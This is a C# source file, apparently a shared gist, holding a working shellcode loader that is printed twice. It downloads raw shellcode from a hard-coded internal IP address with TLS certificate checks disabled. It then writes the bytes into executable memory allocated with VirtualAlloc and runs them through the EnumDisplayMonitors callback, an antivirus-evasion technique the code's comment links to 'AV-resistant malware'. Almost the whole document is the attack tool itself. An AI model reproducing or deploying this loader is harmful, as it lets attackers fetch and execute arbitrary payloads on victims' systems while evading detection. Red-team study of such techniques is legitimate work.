zux0x3a/callback_inj.cs

## callback_inj.cs
using System;
using System.Runtime.InteropServices;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
using System.Net;

namespace callback_function
{


    internal class Program
    {

        public const uint MEM_COMMIT = 0x00001000;
        public const uint PAGE_EXECUTE_READWRITE = 0x40;


        [DllImport("kernel32")]
        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);


        [DllImport("user32.dll")]
        private static extern bool EnumDisplayMonitors(IntPtr hdc, IntPtr lprcClip, IntPtr lpfnEnum, uint dwData);


        public static byte[] download_shellcode(string shellcode_url)

        {
            WebClient dwl = new WebClient();

            dwl.Headers.Add("User-Agent", "Mozilla/5.0 (windows)");
            ServicePointManager.Expect100Continue = true;
            ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;


            ServicePointManager.ServerCertificateValidationCallback = delegate
            {
                return true;
            };

            byte[] chunk = dwl.DownloadData(shellcode_url);
            return chunk;
        }


        public static void printshellcode( byte[] shellcodeBytes)
        {
            // ref:  https://blog.securityevaluators.com/creating-av-resistant-malware-part-3-fdacdf071a5f

            StringBuilder shellcode = new StringBuilder();
            shellcode.Append(shellcodeBytes.Length);

            shellcode.Append("] { ");
            for (int i = 0; i < shellcodeBytes.Length; i++)
            {

                shellcode.Append("0x");
                shellcode.AppendFormat("{0:x2}", shellcodeBytes[i]);
                if (i < shellcodeBytes.Length - 1)
                {
                    shellcode.Append(",");

                }

            }
            shellcode.Append("};");
            Console.WriteLine(shellcode.ToString());

        }


    static void Main(string[] args)


        {
            byte[] buf = download_shellcode("http://192.168.33.133/shellcode.bin"); // shellcode should be RAW format
            printshellcode(buf); // you can comment this, just for debugging matters

            int payloadSize = buf.Length;
            IntPtr addr = VirtualAlloc (IntPtr.Zero, (uint)payloadSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(buf, 0, addr, payloadSize);
            EnumDisplayMonitors(IntPtr.Zero, IntPtr.Zero, addr, 0x00);

        }
    }
}
	using System;
	using System.Runtime.InteropServices;
	using System.Collections.Generic;
	using System.Linq;
	using System.Text;
	using System.Threading.Tasks;
	using System.IO;
	using System.Net;

	namespace callback_function
	{


	internal class Program
	{

	public const uint MEM_COMMIT = 0x00001000;
	public const uint PAGE_EXECUTE_READWRITE = 0x40;


	[DllImport("kernel32")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);


	[DllImport("user32.dll")]
	private static extern bool EnumDisplayMonitors(IntPtr hdc, IntPtr lprcClip, IntPtr lpfnEnum, uint dwData);


	public static byte[] download_shellcode(string shellcode_url)

	{
	WebClient dwl = new WebClient();

	dwl.Headers.Add("User-Agent", "Mozilla/5.0 (windows)");
	ServicePointManager.Expect100Continue = true;
	ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;


	ServicePointManager.ServerCertificateValidationCallback = delegate
	{
	return true;
	};

	byte[] chunk = dwl.DownloadData(shellcode_url);
	return chunk;
	}




	public static void printshellcode( byte[] shellcodeBytes)
	{
	// ref: https://blog.securityevaluators.com/creating-av-resistant-malware-part-3-fdacdf071a5f

	StringBuilder shellcode = new StringBuilder();
	shellcode.Append(shellcodeBytes.Length);

	shellcode.Append("] { ");
	for (int i = 0; i < shellcodeBytes.Length; i++)
	{

	shellcode.Append("0x");
	shellcode.AppendFormat("{0:x2}", shellcodeBytes[i]);
	if (i < shellcodeBytes.Length - 1)
	{
	shellcode.Append(",");

	}

	}
	shellcode.Append("};");
	Console.WriteLine(shellcode.ToString());

	}




	static void Main(string[] args)



	{
	byte[] buf = download_shellcode("http://192.168.33.133/shellcode.bin"); // shellcode should be RAW format
	printshellcode(buf); // you can comment this, just for debugging matters

	int payloadSize = buf.Length;
	IntPtr addr = VirtualAlloc (IntPtr.Zero, (uint)payloadSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	Marshal.Copy(buf, 0, addr, payloadSize);
	EnumDisplayMonitors(IntPtr.Zero, IntPtr.Zero, addr, 0x00);

	}
	}
	}
No results found